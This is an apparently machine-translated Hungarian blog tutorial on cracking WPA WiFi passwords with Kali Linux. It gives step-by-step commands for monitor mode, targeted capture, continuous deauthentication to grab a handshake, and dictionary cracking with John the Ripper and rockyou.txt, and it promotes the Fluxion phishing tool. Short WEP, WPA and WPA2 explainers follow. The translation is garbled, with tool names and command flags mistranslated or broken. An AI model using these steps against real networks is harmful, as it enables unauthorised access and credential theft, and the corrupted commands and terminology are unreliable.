Hogyan Lehet Feltörni Wifi Segítségével Kali Linux?

a legtöbb kérdést a Google , hogyan lehet feltörni Wifi segítségével Kali Linux , Hack wifi , hogyan lehet feltörni Wifi segítségével Kali Linux, stb. De először értsd meg, mi a Wifi & titkosítása.

hozzászólás tartalma

mi az a Wi-Fi, és lehet-e feltörni?

a Wi-Fi egy népszerű vezeték nélküli hálózati technológia neve, amely rádióhullámokat használ a vezeték nélküli nagysebességű Internet és hálózati kapcsolatok biztosításához. Általános tévhit, hogy a Wi-Fi kifejezés a “vezeték nélküli hűség” rövidítése, azonban ez nem így van. A Wi-Fi egyszerűen egy védjeggyel ellátott kifejezés, amely azt jelenti, hogy IEEE 802.11 x.

amikor bármilyen eszközről wifi hackelésről beszélünk, a wifi biztonsága a legfontosabb. Tehát amikor megpróbáljuk feltörni a wifi-t, nagyon könnyű feltörni vagy feltörni a WPS elérhető Rendszer jelszavát. A WPS a Titkosítás egyik típusa, amelyet a wifi hálózat biztosítására használnak, ezért kezdjük a gyors bemutatóval.

használt eszközök csapkod WiFi jelszót Kali-Linux

főleg az általunk használt kali Linux beépített eszközkészlet csapkod wifi jelszót, amely a következők:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • Hasfelmetsző János
  • aircrack-ng

Airmon-ng

ez a szkript használható a monitor mód engedélyezése vezeték nélküli interfészeken. Arra is használható, hogy visszatérjen a monitor módból a felügyelt módba. Az airmon-ng parancs paraméterek nélküli megadása megmutatja az interfészek állapotát.

használat: airmon-ng < start|stop>< interfész>vagy airmon-ng < check|check kill>

Aireplay-ng

Aireplay-ng a keretek befecskendezésére szolgál.

az elsődleges funkció a forgalom generálása az aircrack-ng későbbi használatához a WEP és WPA-PSK kulcsok feltöréséhez. Vannak különböző támadások, amelyek okozhatnak deauthentications céljából elfog WPA kézfogás adatok, hamis hitelesítés, interaktív csomag visszajátszás, kézzel készített ARP request injection és ARP-request reinjection. A packetforge-ng eszközzel tetszőleges keretek hozhatók létre.

a legtöbb illesztőprogramot javítani kell az injekció beadásához.

Airodump-ng

az Airodump-ng nyers 802.11 képkockák csomagrögzítésére szolgál, és különösen alkalmas WEP IV (inicializáló vektor) gyűjtésére az aircrack-ng-vel való felhasználás céljából. Ha van egy GPS-vevő csatlakoztatva a számítógéphez, az airodump-ng képes naplózni a talált Hozzáférési pontok koordinátáit.

ezenkívül az airodump-ng számos fájlt ír ki, amelyek tartalmazzák az összes látott hozzáférési pont és ügyfél adatait.

Hccap

az aircrack-ng capture hash-ek konvertálása .hccapx ezt a parancsot használjuk.

Hasfelmetsző János

a jelszó feltöréséhez a Hasfelmetsző Jánost használjuk az utolsó szakaszban. ezzel az eszközzel összehasonlítjuk a kivonatokat a jelszó szótárral. Sok más módja van, de megpróbáljuk az egyiket.

Aircrack-ng

Aircrack-ng egy komplett eszközcsomagot, hogy értékelje WiFi hálózat biztonságát.

a WiFi biztonság különböző területeire összpontosít:

  • ellenőrzés: Packet capture és export adatok szöveges fájlok további feldolgozásra harmadik fél eszközök
  • támadó: Replay támadások, deauthentication, hamis Hozzáférési pontok és mások keresztül packet injection
  • tesztelés: ellenőrzése WiFi kártyák és a vezető képességeit (capture and injection)
  • repedés: WEP és WPA PSK (WPA 1 és 2)

lépéseket, hogy csapkod WiFi segítségével Kali-Linux vagy bármely más Debian Linux operációs rendszer.

minden parancs leírása a fenti ellenőrizze, hogy ha van bármilyen probléma.

1. lépés :

először vegye a hálózati kártyát monitor módba a környező hálózatok figyeléséhez.

#airmon-ng start wlan1

1
2

#airodump-ng wlan1mon

3
4

2. lépés:

#airodump-ng –bssid 2C:55:D3:B1:35: 0C-c 1-W kalip300 wlan1mon

5
6

3. lépés:

#aireplay-ng -0 0-a 2C:55:D3:B1: 35:0C wlan1mon

7

miután elfog sucsessfully handshak fájlt látunk valami ilyesmit.

8

4. lépés:

#aircrack-ng kalip300-01.cap-J john

9

5. lépés:

# hccap2john john.hccap > wpa

Lépés 6:

#john –szólista*/root/Desktop/rockyou.txt / root / Desktop / wpa

és mi sucsessfully csapkod a wifi jelszót kali linux

Wifi hacker eszköz :- Fluxion

a Fluxion egy biztonsági audit és társadalommérnöki kutatási eszköz. Ez egy remake linset által vk496 (remélhetőleg) kevesebb hibát és több funkciót. A parancsfájl megkísérli letölteni a WPA/WPA2 kulcsot egy cél hozzáférési pontról egy social engineering (adathalász) támadás segítségével. Kompatibilis a Kali (rolling) legújabb kiadásával. A Fluxion támadásainak beállítása többnyire kézi, de a kísérleti automatikus mód kezeli a támadások néhány beállítási paraméterét. Olvassa el a GYIK-et, mielőtt kérdéseket kérne.

vezeték nélküli titkosítás

WEP titkosítás

Wired Equivalent Privacy (WEP) egy IEEE 802.11 vezeték nélküli protokoll, amely biztonsági algoritmusokat biztosít az adatok titkosításához vezeték nélküli átvitel során.

a WEP egy 24 bites inicializálási vektort(IV) használ az RC4 adatfolyam titkosításához a titoktartás érdekében, a CRC-32 ellenőrző összeget pedig a vezeték nélküli átvitel integritásához.

a WEP működése

  1. a CRC-32 ellenőrző összeg az adatok 32 bites integritás-ellenőrzési értékének (ICV) kiszámítására szolgál, amely viszont hozzáadódik az adatkerethez.

2. A WEP-kulcshoz hozzáadunk egy 24 bites tetszőleges számot, amelyet inicializáló vektornak (IV) nevezünk; a WEP-kulcsot és a IV-et együtt WEP-magnak nevezzük.

3. A WEP magot használják az RC4 algoritmus bemeneteként egy kulcsfolyam létrehozásához (a kulcsfolyamot bitenként Xorálják az adatok és az ICV kombinációjával a titkosított adatok előállításához).

4. Az IV mező (IV+PAD+KID) hozzáadódik a rejtjelezett szöveghez a MAC keret létrehozásához

hogyan működik a WEP

WPA titkosítás

a Wi-Fi Protected Access (WPA) egy 802-es WLAN-alapú adattitkosítási módszer.11 szabványok.

ez egy pillanatkép a 802.11 i-ről (fejlesztés alatt), amely erősebb titkosítást biztosít, és lehetővé teszi a PSK-t az EAP hitelesítéshez.

hogyan működik a WPA

az időbeli titkosítási kulcs, az átviteli cím és a TKIP szekvenciaszámláló (TSC) az RC4 algoritmus bemeneteként szolgál a keystram létrehozásához.

a MAC Service Data Unit (MSDU) és az message intergrity check (mic) a Michael algoritmust használja.

az MSDU és a MIC kombinációja széttöredezett a MAC Protocol Data Unit (MPDU) létrehozásához.

32 bites integritás-ellenőrzési érték (ICV) kerül kiszámításra az MPDU

az MPDU és az ICV kombinációja bitenként Xorizálódik a Keysteam segítségével a titkosított adatok előállításához

az IV hozzáadódik a titkosított adatokhoz a MAC keret létrehozásához.

WPA 2 titkosítás

a WPA 2 erősebb adatvédelmet és hálózati hozzáférés-vezérlést biztosít a vállalati és WI-FI felhasználók számára

kormányzati szintű biztonságot nyújt a Nemzeti Szabványügyi és Technológiai Intézet (NIST) FIPS 140-2 kompatibilis AES titkosítási algoritmus végrehajtásával.

WPA2 – Personal

WPA2 – Personal beállító jelszót (előre megosztott kulcsot) használ a jogosulatlan hálózati hozzáférés védelmére.

PSK módban minden vezeték nélküli hálózati eszköz egy 128 bites kulcs segítségével titkosítja a hálózati forgalmat, amely 8-63 ASCII karakterből áll.

WPA2 – Enterprise

magában foglalja az EAP-t vagy a RADIUS-t a központosított ügyfél-hitelesítéshez, több hitelesítési módszerrel, például tokenkártyákkal, Kerberókkal, tanúsítványokkal stb.

a felhasználók bejelentkezési hitelesítő adatait egy központi szerver rendeli hozzá, amelyet a hálózathoz való csatlakozáskor be kell mutatniuk.

hogyan működik a WPA2

a WPA2 CCMP implementációjában a Mac fejlécadatokat használják kiegészítő hitelesítési adatok (AAD) létrehozására.

szekvenált csomagszámot (PN) használnak a nonce felépítéséhez.

az adatok titkosításához az AAD, az időbeli kulcs és a nonce, valamint a CCMP használatos.

a WPA2 MAC keret épít a MAC fejléc, CCMP fejléc, titkosított adatok és titkosított MIC

 hogyan WPA2 működik

lehet, hogy kimaradt, hogyan lehet feltörni telefon

Write a Comment

Az e-mail-címet nem tesszük közzé.